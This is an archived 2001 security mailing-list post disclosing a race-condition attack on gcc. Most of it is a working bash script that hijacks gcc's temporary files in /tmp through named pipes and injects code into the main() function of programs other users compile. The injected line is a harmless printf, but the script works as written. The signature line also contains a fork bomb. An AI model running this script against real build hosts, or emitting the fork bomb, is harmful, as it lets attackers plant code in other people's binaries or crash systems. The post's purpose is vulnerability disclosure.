Due to the questions about possibility of performing 'pipe attacks' - there's *working* example of program, which appends function printf("This program has been infected!\n"); after declarations in the main() function to sources compiled using gcc. That IS serious problem, isn't it? Of course, of course, this one (gcc vunerability) can be easily patched, but gcc isn't the only one vunerable program! Ok, here it is: -- #!/bin/bash # Advanced gcc viral implant # by Michal Zalewski (lcamtufat_private) # ** EXECUTION PROHIBITED ** CC1=`find /usr/lib/gcc-lib -name cc1` VICT=0 renice +20 $PPID >&/dev/null cd /tmp echo "I'm free, I'm free! Oh, I'm free..." while :; do V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."` if [ ! "$V" = "" ]; then mkfifo -m 666 ${V}.s &>/dev/null if [ -p ${V}.s ]; then sleep 1 cat ${V}.i|awk 'match($2,"main")==1{x=1};y!=1&&x==1&&match($1,"(">0){y=1;print "printf(\"This program has been infected!\\n\");"};{print $0}'>.lv$$.i $CC1 .lv$$.i cat ${V}.s>/dev/null cat .lv$$.s >${V}.s let VICT=VICT+1 echo "Someone has been just trapped ($VICT)." fi rm -f .lv$$.* ${V}.s &>/dev/null fi done -- _______________________________________________________________________ Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:42:51 PDT